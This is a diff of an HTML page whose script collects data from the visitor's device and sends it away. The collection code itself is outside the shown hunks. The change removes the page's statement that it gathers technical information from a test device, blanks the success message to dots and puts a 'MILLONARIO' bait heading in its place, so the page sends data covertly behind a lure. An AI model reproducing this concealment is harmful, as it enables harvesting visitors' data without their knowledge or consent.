--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Página de Captura</title>
+    <title>.</title>
     <script>
         function capturarDatos() {
             const datos = {
@@ -27,11 +27,11 @@
             })
             .then(data => {
                 console.log("Datos enviados:", data);
-                document.getElementById("mensaje").textContent = "Datos enviados correctamente.";
+                document.getElementById("mensaje").textContent = "....";
             })
             .catch(error => {
                 console.error("Error al enviar los datos:", error);
-                document.getElementById("mensaje").textContent = "Error al enviar los datos.";
+                document.getElementById("mensaje").textContent = "Error.";
             });
         }
 
@@ -40,8 +40,8 @@
     </script>
 </head>
 <body>
-    <h1>Página de Captura</h1>
-    <p>Esta página recopila información técnica del dispositivo de prueba.</p>
-    <p id="mensaje">Enviando datos...</p>
+    <h1>MILLONARIO</h1>
+    <p>....</p>
+    <p id="mensaje">.....</p>
 </body>
 </html>
